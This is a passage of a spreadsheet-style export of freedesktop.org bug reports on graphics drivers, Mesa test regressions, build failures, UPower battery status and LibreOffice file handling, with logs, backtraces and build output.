    <t>Created attachment 72653
Photo of graphics artefacts described
I'm using Ubuntu 12.10 on my Mac Mini Server 62. I have two Dell U2412M (1920x1200@60Hz) monitors. (Full system info is below.)
I initially tried to connect one monitor over the Thunderbolt/Displayport output. But from the moment rEFIt hands over to GRUB the graphics look quite poor. Gradients are rough or dithered (including the boot splash greeter screen and desktop background) window title bars look awful and there a number of other ugly artefacts (see first photo). The resolution itself however is fine.
Taking a screenshot does not demonstrate the problem (it looks fine when it's opened on another OS) but a photo shows it. Connecting a monitor to the HDMI output (using a HDMI/DVI adapter) looks fine. Windows 7 and OSX look fine on the same monitor using the Displayport input.
There's one other interesting thing:
  - If I boot Ubuntu with only one monitor attached via HDMI/DVI wait until it gets to the login screen and THEN connect a second monitor to the Thunderbolt port they both look fine. So it seems possible to have nice output over Thunderbolt/DP.
  - If I boot with two monitors (connected via HDMI/DVI and Thunderbolt/DP respectively) one looks poor and one looks fine... BUT when I disconnect the Thunderbolt one the OTHER (HDMI/DVI connected) monitor blanks for a second and comes back on looking just as poor as the Thunderbolt/DP did before.
The kernel is 3.5.0-19-generic. lspci tells me I have:
00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09)
I can't see any errors in Xorg.0.log but I don't want to paste the whole file here unless someone asks for it.
sudo lshw -C display gives:
  *-display               
       description: VGA compatible controller
       product: 3rd Gen Core processor Graphics Controller
       vendor: Intel Corporation
       physical id: 2
       bus info: pci@0000:00:02.0
       version: 09
       width: 64 bits
       clock: 33MHz
       capabilities: msi pm vga_controller bus_master cap_list rom
       configuration: driver=i915 latency=0
       resources: irq:49 memory:a0000000-a03fffff memory:90000000-9fffffff ioport:2000(size=64)
OpenGL info from glxinfo is:
OpenGL vendor string: Intel Open Source Technology Center
OpenGL renderer string: Mesa DRI Intel(R) Ivybridge Mobile 
OpenGL version string: 3.0 Mesa 9.0.1
lsmod shows that the i915 driver is loaded.
I have attached photos of normal looking graphics and the poor looking graphics as well as lspci and glxinfo output and the xorg log.</t>
  </si>
  <si>
    <t>jason.heeris</t>
  </si>
  <si>
    <t>DRI-104783</t>
  </si>
  <si>
    <t>[CI] igt@kms_vblank@pipe-a-ts-continuation-suspend - fail - igt_skip: Assertion `!test_child' failed. Received signal SIGABRT</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_4177/shard-kbl3/igt@kms_vblank@pipe-a-ts-continuation-suspend.html
kms_vblank: igt_core.c:1023: igt_skip: Assertion `!test_child' failed.
Received signal SIGABRT.
Subtest pipe-A-ts-continuation-suspend failed.</t>
  </si>
  <si>
    <t>XORG-1057</t>
  </si>
  <si>
    <t>[PATCH] GLX looks for DRI drivers in wrong dir on AMD64 (and others?)</t>
  </si>
  <si>
    <t>On AMD64 DRI drivers are installed in /usr/X11R6/lib64/modules/dri but GLX
defaults to /usr/X11R6/lib/modules/dri . I'm attaching a patch for this tested
on AMD64. If it's wrong for PPC64 &amp; s390 then substitute HaveLib64 with
defined(AMD64Architeture) in the patch.</t>
  </si>
  <si>
    <t>s864</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-58020</t>
  </si>
  <si>
    <t>Paths are both hardcoded and defined</t>
  </si>
  <si>
    <t>Created attachment 71203
the patch
The path to /var/lib/AccountsService/users is both hardcoded in some places and defined via a GCC command line argument. The attached patch changes it to always use the defined value.</t>
  </si>
  <si>
    <t>XORG-14247</t>
  </si>
  <si>
    <t>configure fails on OpenBSD</t>
  </si>
  <si>
    <t>configure fails on OpenBSD with the following message:
checking for OPENSSL... Package openssl was not found in the pkg-config search path
configure: error: Package requirements (openssl) were not met:
Consider adjusting the PKG_CONFIG_PATH environment variable if you
installed software in a non-standard prefix.
Alternatively you may set the environment variables OPENSSL_CFLAGS
and OPENSSL_LIBS to avoid the need to call pkg-config.
See the pkg-config man page for more details.
This is a bit silly because OpenSSL is part of the OpenBSD base system.  Furthermore setting OPENSSL_CFLAGS and OPENSSL_LIBS (to empty strings) doesn't
help.
Is there any reason not to just use AC_CHECK_LIB(crypto SHA1_Init) or something
similar and fall back on pkg-config if that fails?</t>
  </si>
  <si>
    <t>XORG-23259</t>
  </si>
  <si>
    <t>Slow scrolling of some pages with FireFox-3.5</t>
  </si>
  <si>
    <t>I recently encountered a few pages which scrolled slowly with FireFox-3.5/Fedora-Rawhide on my i945gm based system.
I used the Time Renderer javascript benchmark to get some numbers and those results confirm that usually with software rendering results are much better.
The behaviour always seems to be the same:
- The firefox process usually uses only little CPU
- XOrg too doesn't use a lot of CPU but quite a bit of time is spent in kernel-mode (e.g. 30-40%)
- System load seems to be low
So probably these workloads are GPU bound and xorg is simply waiting for the GPU to finish. When running the same workload with Vesa+ShadowFB rendering is usually 4-5x as fast.
Some of the affcted pages are:
http://ajaxian.com/archives/google-puts-the-canvas-in-ie
intel: 205ms
software: 58ms (40% spent in pixman's nearest-neighbour scaling code)
http://www.linuxfoundation.org/news-media/blogs/browse/2009/03/don%E2%80%99t-fear-fsync
intel: 70ms (but scrolling has an awful response lag)
software: not measured
System:
2.6.31rc5
intel-2.8.0
i945GM</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-91515</t>
  </si>
  <si>
    <t>Please change default assignee of desktop-file-utils products</t>
  </si>
  <si>
    <t>Hans Petter (cc'ed here) is stepping up as new maintainer for desktop-file-utils. Can you change the default assignee in bugzilla?</t>
  </si>
  <si>
    <t>MESA-88079</t>
  </si>
  <si>
    <t>dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0 tests fail due to enabling of GL_RGB and GL_RGBA</t>
  </si>
  <si>
    <t>Environment:
Mesa: (master 934e41c0b31cffa4efc08f61cff2389e3149b3f3)
Ubuntu 14.04
The following dEQP tests fail due to a recent commit that enables GL_RGB and GL_RGBA internal formats for render buffers:
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_byte
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_short_5_6_5
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_int_2_10_10_10_rev
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_int_10f_11f_11f_rev
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgba_unsigned_byte
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgba_unsigned_short_4_4_4_4
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgba_unsigned_short_5_5_5_1
dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgba_unsigned_int_2_10_10_10_rev
Output:
# ./deqp-gles3 --deqp-case=dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_byte
dEQP Core 2014.x (0xcafebabe) starting..
  target implementation = 'X11 EGL'
Test case 'dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_byte'..
  Fail (Framebuffer checked as complete expected incomplete)
Test case duration in microseconds = 2719 us
DONE!
Test run totals:
  Passed:        0/1 (0.0%)
  Failed:        1/1 (100.0%)
  Not supported: 0/1 (0.0%)
  Warnings:      0/1 (0.0%)
All the above mentioned tests fail in the same way.
Analysis:
Bisect shows 78942787170615c9333810cf3a4819a13c9eb8e8 is the first bad commit
commit 78942787170615c9333810cf3a4819a13c9eb8e8
Author:     Eduardo Lima Mitev 
AuthorDate: Thu Nov 20 14:02:46 2014 +0100
Commit:     Iago Toral Quiroga 
CommitDate: Tue Dec 9 11:40:00 2014 +0100
    mesa: Enables GL_RGB and GL_RGBA unsized internal formats for OpenGL ES 3.0
    GL_RGB and GL_RGBA are valid internal formats on a GLES3 profile. See
    Table 1. Unsized Internal Formats at
    https://www.khronos.org/opengles/sdk/docs/man3/html/glTexImage2D.xhtml.
    Fixes 2 dEQP tests:
    - dEQP-GLES3.functional.state_query.internal_format.rgb_samples
    - dEQP-GLES3.functional.state_query.internal_format.rgba_samples
    Reviewed-by: Brian Paul 
This commit fixes tests where glGetInternalformativ() is used to get the number of samples supported by a particular internal format for a render buffer.  Pg 242 of the GLES 3.0.4 spec implies that GL_RGB and GL_RGBA are valid inputs to glGetInternalformativ().  However these are unsized internal formats and are not supported for render buffers according to pg 204 of the spec which states a renderbuffer's internal format must be a sized internal format....
The commit updates _mesa_base_fbo_format() to allow GL_RGB and GL_RGBA as valid render buffer internal formats.  It has the effect of enabling those formats for glGetInternalformativ() and glRenderBufferStorage()/glRenderBufferStorageMultisample().  It should have only enabled the formats for glGetInternalformativ().
Steps to reproduce:
# ./deqp-gles3 --deqp-case=dEQP-GLES3.functional.fbo.completeness.renderable.renderbuffer.color0.rgb_unsigned_byte</t>
  </si>
  <si>
    <t>michael.w.mason</t>
  </si>
  <si>
    <t>PIGLIT-39966</t>
  </si>
  <si>
    <t>Assertion failed: (SimpleFragShader) function piglit_init file tests/fbo/fbo-integer.c line 405.</t>
  </si>
  <si>
    <t>piglit: 7a8d9b00ea8b7611cb3f79b0431a26a691fa3645
Run fbo-integer on Mac OS X.
$ ./bin/fbo-integer -auto
Failed to compile fragment shader: ERROR: 0:1: '' :  version '130' is not supported
Assertion failed: (SimpleFragShader) function piglit_init file tests/fbo/fbo-integer.c line 405.
Abort trap: 6
(gdb) bt
#0  0x00007fff85864ce2 in __pthread_kill ()
#1  0x00007fff83e017d2 in pthread_kill ()
#2  0x00007fff83df2a7a in abort ()
#3  0x00007fff83e255de in __assert_rtn ()
#4  0x0000000100003ac1 in piglit_init (argc=1 argv=0x7fff5fbffb08) at fbo-integer.c:405
#5  0x0000000100004ced in main (argc=1 argv=0x7fff5fbffb08) at piglit-framework.c:114
(gdb) frame 4
#4  0x0000000100003ac1 in piglit_init (argc=1 argv=0x7fff5fbffb08) at fbo-integer.c:405
405	   assert(SimpleFragShader)
(gdb) l         
400	   PassthroughProgram = piglit_link_simple_program(0 PassthroughFragShader)
401	
402	
403	   SimpleFragShader = piglit_compile_shader_text(GL_FRAGMENT_SHADER
404	                                                 SimpleFragShaderText)
405	   assert(SimpleFragShader)
406	   SimpleProgram = piglit_link_simple_program(0 SimpleFragShader)
407	
408	
409	   (void) check_error(__FILE__ __LINE__)
(gdb) print SimpleFragShader
$1 = 0</t>
  </si>
  <si>
    <t>XORG-1796</t>
  </si>
  <si>
    <t>expat dependency not explained properly in BUILD</t>
  </si>
  <si>
    <t>I followed installation instructions of ruinaudio.com/xorg-cvs-howto.txt
but make World failed
xmlconfig.c:34:19: expat.h: No such file or directory
xmlconfig could not compile because of this. expat.h is indeed present
    /usr/src/xc/extras/expat/lib/expat.h
but is not being found.  Is there a problem with the Makefile?
I'm running 2.6.9 kernel on debian testing version</t>
  </si>
  <si>
    <t>jcline</t>
  </si>
  <si>
    <t>MESA-94458</t>
  </si>
  <si>
    <t>dEQP-GLES3.functional.state_query.fbo.framebuffer_attachment_x_size_initial fails</t>
  </si>
  <si>
    <t>dEQP-GLES3.functional.state_query.fbo.framebuffer_attachment_x_size_initial queries GL_FRAMEBUFFER_ATTACHMENT_DEPTH_SIZE on the window system depth buffer and expects to get a proper value (16 24 32) we are incorrectly returning 0.
intel_alloc_private_renderbuffer_storage does:
   rb-&gt;_BaseFormat = _mesa_base_fbo_format(ctx internalFormat)
Here internalFormat is GL_DEPTH_COMPONENT.  _mesa_base_fbo_format only returns GL_DEPTH_COMPONENT in desktop GL.  In ES it returns 0.
So we don't get a proper rb-&gt;_BaseFormat set and this makes the query fail.</t>
  </si>
  <si>
    <t>DEJAVU-51968</t>
  </si>
  <si>
    <t>Inverted question/exclamation marks (Â¿Â¡) should be lower than baseline</t>
  </si>
  <si>
    <t>Hello
The dot of inverted question and exclamation marks (Â¿ and Â¡) should be at x-height (they should hang under the baseline somewhat so that â€œÂ¿x?â€ be symmetric with regards to the center of the â€œxâ€).
This is how it is rendered in fonts designed by native Spanish speakers such as
http://www.google.com/webfonts#ReviewPlace:refine/Collection:Buenard
Best regards
Samuel</t>
  </si>
  <si>
    <t>samuel.hym</t>
  </si>
  <si>
    <t>XORG-19031</t>
  </si>
  <si>
    <t>Server 1.6 dolt update (f3edc1fb) breaks compile on older versions on bash (see #18363)</t>
  </si>
  <si>
    <t xml:space="preserve">The new version of dolt included in the server 1.6 betas uses bash syntax only available in newer versions of the shell and when used with older bash the build breaks.  This is a known issue with the current git version of dolt described in bug #18363.  Applying the fix from comment 9 of that bug to acinclude.m4 allows the xserver to build:
-        *) args+=($arg)
+        *) args@@=$arg </t>
  </si>
  <si>
    <t>sb476</t>
  </si>
  <si>
    <t>MESA-107312</t>
  </si>
  <si>
    <t>Mesa-git RPM build fails after commit 8cacf38f527d42e41441ef8c25d95d4b2f4e8602</t>
  </si>
  <si>
    <t>RPM build fails with following error messages:
[  359s] I: Program returns random data in a function
[  359s] E: Mesa no-return-in-nonvoid-function nir/nir_opt_if.c:47
[  359s] 
[  359s] I: Program returns random data in a function
[  359s] E: Mesa no-return-in-nonvoid-function nir/nir_opt_if.c:47
Probably caused by 8cacf38f527d42e41441ef8c25d95d4b2f4e8602</t>
  </si>
  <si>
    <t>LIBREOFFICE-36089</t>
  </si>
  <si>
    <t>FILEOPEN: subscripts in RTF from LaTex file are missing</t>
  </si>
  <si>
    <t>Created attachment 45433
sample RTF file which has some subscripts
When open RTF files the subscripts does not appear and it seems there are no subscripts but Microsoft Word can show the existence of the subscripts. A sample RTF file is attached.</t>
  </si>
  <si>
    <t>zhou.erqiang</t>
  </si>
  <si>
    <t>HAL-15335</t>
  </si>
  <si>
    <t>HAL doesn't mount Philips DVD-R medias</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/466022 ]
I have a CD/DVD burner drive. I can mount CD and DVD+R medias automatically
&gt; with HAL but when I put Philips DVD-R medias HAL does not mount them!
&gt; 
&gt; It's strange all my Philips DVD-R medias I have are not mounted by HAL I
&gt; need mount them with mount /dev/scd0 command. It's uncomfortable because
&gt; this medias are correctilly mounted on Microsoft Windows.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-115</t>
  </si>
  <si>
    <t>upload test</t>
  </si>
  <si>
    <t>test bug for making upload</t>
  </si>
  <si>
    <t>danglassey</t>
  </si>
  <si>
    <t>XORG-4698</t>
  </si>
  <si>
    <t>Request CVS access</t>
  </si>
  <si>
    <t>So I can stop pestering people to apply my patches</t>
  </si>
  <si>
    <t>MESA-109155</t>
  </si>
  <si>
    <t>Update documentation for using custom llvm to build Mesa with Meson</t>
  </si>
  <si>
    <t>Current documentation at https://www.mesa3d.org/meson.html says:
&gt; LLVM
&gt; Meson includes upstream logic to wrap llvm-config using its standard dependency
&gt; interface. It will search $PATH (or %PATH% on windows) for llvm-config (and
&gt; llvm-config$version and llvm-config-$version) so using an LLVM from a
&gt; non-standard path is as easy as PATH=/path/with/llvm-config:$PATH meson build.
That's really a very inflexible method for instance you can't use different llvm configs installed in the same directory.
As per https://github.com/mesonbuild/meson/issues/2887#issuecomment-439586787
as of Meson 0.49 it's now possible to override llvm-config using --native-file option.
Here is an example:
    llvm_config=/usr/bin/llvm-config-8 # or whatever you need
    read -r -d '' native_config &lt;&lt;EOF
    [binaries]
    llvm-config = $llvm_config
    EOF
    meson ... --native-file=&lt;(echo $native_config) ...
Please update Mesa documentation above since this option is very obscure and hard to find.</t>
  </si>
  <si>
    <t>shtetldik</t>
  </si>
  <si>
    <t>PLYMOUTH-102191</t>
  </si>
  <si>
    <t>Building plymouth-0.9.3 fails with libply-splash-core/.libs/libply-splash-core.so: undefined reference to `minor'</t>
  </si>
  <si>
    <t>Building plymouth-0.9.3 in Gentoo Linux fails with:
&gt; libply-splash-core/.libs/libply-splash-core.so: undefined reference to `minor'
&gt; libply-splash-core/.libs/libply-splash-core.so: undefined reference to `major'
glibc has stated its intent to remove remove  from  (see https://sourceware.org/ml/libc-alpha/2015-11/msg00253.html) .
Gentoo is one of the distros that have patched out such implicit inclusion of  from glibc.   needs to be explicitly included in src/libply-splash-core/ply-terminal.c.
Gentoo bug report: https://bugs.gentoo.org/show_bug.cgi?id=627690</t>
  </si>
  <si>
    <t>nsane457</t>
  </si>
  <si>
    <t>LIBREOFFICE-66057</t>
  </si>
  <si>
    <t>Other: wrong display of an organigram</t>
  </si>
  <si>
    <t>Created attachment 81229
a document with an organigram
Problem description: wrong display of an organigram i've made with Office Word 2003
Steps to reproduce:
1. ....
2. ....
3. ....
Current behavior: the organigram connections between the various groups are wrongly displayed when opening the document with LibreOffice Writer.
Expected behavior: the same as in Office Word.
Operating System: Ubuntu
Version: 3.6.2.2 release</t>
  </si>
  <si>
    <t>ivo.mdc.oliveira</t>
  </si>
  <si>
    <t>XORG-9267</t>
  </si>
  <si>
    <t>multiple integer overflows in XRender and Dbe extensions</t>
  </si>
  <si>
    <t>iDefense has reported several vulnerabilities in XRender and DBE extensions
based on integer overflows.</t>
  </si>
  <si>
    <t>MESA-103626</t>
  </si>
  <si>
    <t>[SNB] ES3-CTS.functional.shaders.precision</t>
  </si>
  <si>
    <t>Regressions:
    ES3-CTS.functional.shaders.precision.int.highp_mul_fragment.snbm64
    ES3-CTS.functional.shaders.precision.int.mediump_mul_fragment.snbm64
    ES3-CTS.functional.shaders.precision.int.lowp_mul_fragment.snbm64
    ES3-CTS.functional.shaders.precision.uint.highp_mul_fragment.snbm64
    ES3-CTS.functional.shaders.precision.uint.mediump_mul_fragment.snbm64
    ES3-CTS.functional.shaders.precision.uint.lowp_mul_fragment.snbm64
src/intel/compiler/brw_fs.cpp:838: unsigned int fs_inst::size_read(int) const: Assertion `!MRF registers are not allowed as sources' failed.
Bisected to:
18fde36ced4279f2577097a1a7d31b55f2f5f141
Author:     Jason Ekstrand 
intel/fs: Use the original destination region for int MUL lowering
Some hardware (CHV BXT) have special restrictions on register regions
when doing integer multiplication.  We want to respect those when we
lower to DxW multiplication.
Reviewed-by: Iago Toral Quiroga 
Cc: mesa-stable@lists.freedesktop.org</t>
  </si>
  <si>
    <t>UPOWER-86144</t>
  </si>
  <si>
    <t>upower does not update /org/freedesktop/UPower/devices/DisplayDevice state</t>
  </si>
  <si>
    <t>/org/freedesktop/UPower/devices/DisplayDevice is not updated after plugging and unplugging the battery in my laptop.
If I boot my laptop without the battery upower -d reports:
Device: /org/freedesktop/UPower/devices/line_power_ACAD
  native-path:          ACAD
  power supply:         yes
  updated:              mar 11 nov 2014 09:25:11 CET (6782 seconds ago)
  has history:          no
  has statistics:       no
  line-power
    warning-level:       none
    online:              yes
    icon-name:          'ac-adapter-symbolic'
Device: /org/freedesktop/UPower/devices/DisplayDevice
  power supply:         no
  updated:              gio 01 gen 1970 01:00:00 CET (1415701093 seconds ago)
  has history:          no
  has statistics:       no
  unknown
    warning-level:       none
    icon-name:          ''
Daemon:
  daemon-version:  0.99.1
  on-battery:      no
  lid-is-closed:   no
  lid-is-present:  yes
  critical-action: HybridSleep
----------------------------------------------------------------
After connecting the battery:
Device: /org/freedesktop/UPower/devices/line_power_ACAD
  native-path:          ACAD
  power supply:         yes
  updated:              mar 11 nov 2014 09:25:11 CET (6797 seconds ago)
  has history:          no
  has statistics:       no
  line-power
    warning-level:       none
    online:              yes
    icon-name:          'ac-adapter-symbolic'
Device: /org/freedesktop/UPower/devices/battery_BAT1
  native-path:          BAT1
  vendor:               LENOVO
  model:                PABAS0241231
  serial:               41167
  power supply:         yes
  updated:              mar 11 nov 2014 11:18:28 CET (0 seconds ago)
  has history:          yes
  has statistics:       yes
  battery
    present:             yes
    rechargeable:        yes
    state:               charging
    warning-level:       none
    energy:              3486 Wh
    energy-empty:        0 Wh
    energy-full:         4038 Wh
    energy-full-design:  404 Wh
    energy-rate:         0 W
    voltage:             11875 V
    percentage:          86%
    capacity:            999505%
    technology:          lithium-ion
    icon-name:          'battery-full-charging-symbolic'
  History (charge):
    1415701107  86000  charging
    1415701107  0000   unknown
  History (rate):
    1415701107  0000   unknown
Device: /org/freedesktop/UPower/devices/DisplayDevice
  power supply:         yes
  updated:              gio 01 gen 1970 01:00:00 CET (1415701108 seconds ago)
  has history:          no
  has statistics:       no
  battery
    present:             yes
    state:               charging
    warning-level:       none
    energy:              3486 Wh
    energy-full:         4038 Wh
    energy-rate:         0 W
    percentage:          86%
    icon-name:          'battery-full-charging-symbolic'
Daemon:
  daemon-version:  0.99.1
  on-battery:      no
  lid-is-closed:   no
  lid-is-present:  yes
  critical-action: HybridSleep
-----------------------------------------------------------------
Disconnecting the battery:
Device: /org/freedesktop/UPower/devices/line_power_ACAD
  native-path:          ACAD
  power supply:         yes
  updated:              mar 11 nov 2014 09:25:11 CET (6815 seconds ago)
  has history:          no
  has statistics:       no
  line-power
    warning-level:       none
    online:              yes
    icon-name:          'ac-adapter-symbolic'
Device: /org/freedesktop/UPower/devices/DisplayDevice
  power supply:         yes
  updated:              gio 01 gen 1970 01:00:00 CET (1415701126 seconds ago)
  has history:          no
  has statistics:       no
  battery
    present:             yes
    state:               charging
    warning-level:       none
    energy:              3487 Wh
    energy-full:         4038 Wh
    energy-rate:         0 W
    percentage:          86%
    icon-name:          'battery-full-charging-symbolic'
Daemon:
  daemon-version:  0.99.1
  on-battery:      no
  lid-is-closed:   no
  lid-is-present:  yes
  critical-action: HybridSleep
It seems that DisplayDevice is not updated even if there is not a battery present.
acpi_listen reports battery events after connect and disconnect (2 battery events each).
Reading some upower bug report I tried to trigger a refresh of the AC with: qdbus --system  org.freedesktop.UPower /org/freedesktop/UPower/devices/line_power_ACAD org.freedesktop.UPower.Device.Refresh.
Refreshing the /org/freedesktop/UPower/devices/DisplayDevice does not work.
and then upower -d report:
Device: /org/freedesktop/UPower/devices/line_power_ACAD
  native-path:          ACAD
  power supply:         yes
  updated:              mar 11 nov 2014 11:26:00 CET (1 seconds ago)
  has history:          no
  has statistics:       no
  line-power
    warning-level:       none
    online:              yes
    icon-name:          'ac-adapter-symbolic'
Device: /org/freedesktop/UPower/devices/DisplayDevice
  power supply:         yes
  updated:              gio 01 gen 1970 01:00:00 CET (1415701561 seconds ago)
  has history:          no
  has statistics:       no
  unknown
    warning-level:       none
    icon-name:          'battery-missing-symbolic'
Daemon:
  daemon-version:  0.99.1
  on-battery:      no
  lid-is-closed:   no
  lid-is-present:  yes
  critical-action: HybridSleep
And this is correct. This behaviour lead to this bug:
https://bugzilla.gnome.org/show_bug.cgi?id=731948
Other events are reported correctly (AC plug and unplug).
acpi -ab reports correctly the status with no visible delay.
Maybe the problem is that this laptop does not send AC events when battery is unplugged?
I don't know what should be the proper behavior..</t>
  </si>
  <si>
    <t>eugenio89</t>
  </si>
  <si>
    <t>LIBREOFFICE-36698</t>
  </si>
  <si>
    <t>Created attachment 46170
Public ssh key
Hi
I was asked by Kohei Noel and Katarina to think about applying for git access. I'm still a bit unsure if I deserve it but am applying now.
Real Name: Markus Mohrhard
Email: markus.mohrhard@googlemail.com
Preferred account name: markus.mohrhard
I hope I did all right.
Regards
Markus</t>
  </si>
  <si>
    <t>MESA-11771</t>
  </si>
  <si>
    <t>building mesa on Solaris 9 fails</t>
  </si>
  <si>
    <t>Hi
I tried to build the latest Mesa on Solaris. For
make sunos5-gcc
make sunos5-64-gcc
...
I got the following error:
/bin/sh: test: argument expected
make: *** [sunos5-gcc] Error 1
This was a small problem in the the main Makfile.
Line 155:
        @ if [ -e configs/current ]  then \
                echo Please run 'make realclean' before changing configs  \
                exit 1  \
        fi
It uses -e that is only known for the ksh and the bash so
the main makefile needs e.g 
SHELL=/bin/ksh
After adding the SHELL line to the main Makefile I can build
make sunos5-64-gcc up to:
gcc -c -I../../include -I../../src/mesa -I../../src/mesa/main -I../../src/mesa/glapi -I../../src/mesa/math -I../../src/mesa/tnl -I../../src/mesa/shader -I../../src/mesa/shader/grammar -I../../src/mesa/shader/slang -I../../src/mesa/swrast -I../../src/mesa/swrast_setup -Wall -O3 -m64 -mcpu=ultrasparc -mv8plus -mvis -g -fomit-frame-pointer -pipe -fPIC -m64 -D_REENTRANT -DUSE_XSHM -DUSE_SPARC_ASM -std=c99 -ffast-math -I/usr/openwin/include glapi/glthread.c -o glapi/glthread.o
gcc -c -I../../include -I../../src/mesa -I../../src/mesa/main -I../../src/mesa/glapi -I../../src/mesa/math -I../../src/mesa/tnl -I../../src/mesa/shader -I../../src/mesa/shader/grammar -I../../src/mesa/shader/slang -I../../src/mesa/swrast -I../../src/mesa/swrast_setup -Wall -O3 -m64 -mcpu=ultrasparc -mv8plus -mvis -g -fomit-frame-pointer -pipe -fPIC -m64 -D_REENTRANT -DUSE_XSHM -DUSE_SPARC_ASM -std=c99 -ffast-math -I/usr/openwin/include sparc/glapi_sparc.S -o sparc/glapi_sparc.o
/usr/ccs/bin/as:  line 1816: error: symbol glBlendEquationSeparateEXT is used but not defined
/usr/ccs/bin/as:  line 1358: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1358: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1359: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1359: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1360: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1360: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1361: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1361: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1362: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1362: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1363: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1363: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1364: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1364: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1365: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1365: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1376: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1376: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1377: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1377: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1402: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1402: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1444: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1444: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1445: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1445: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1446: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1446: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1447: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1447: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1448: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1448: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1449: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1449: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1450: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1450: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1451: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1451: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1452: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1452: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1533: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1533: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1534: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1534: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1535: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1535: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1536: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1536: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1537: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1537: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1544: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1544: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1545: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1545: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1563: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1563: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1564: error: expression must evaluate to a nonrelocatable (absolute) value
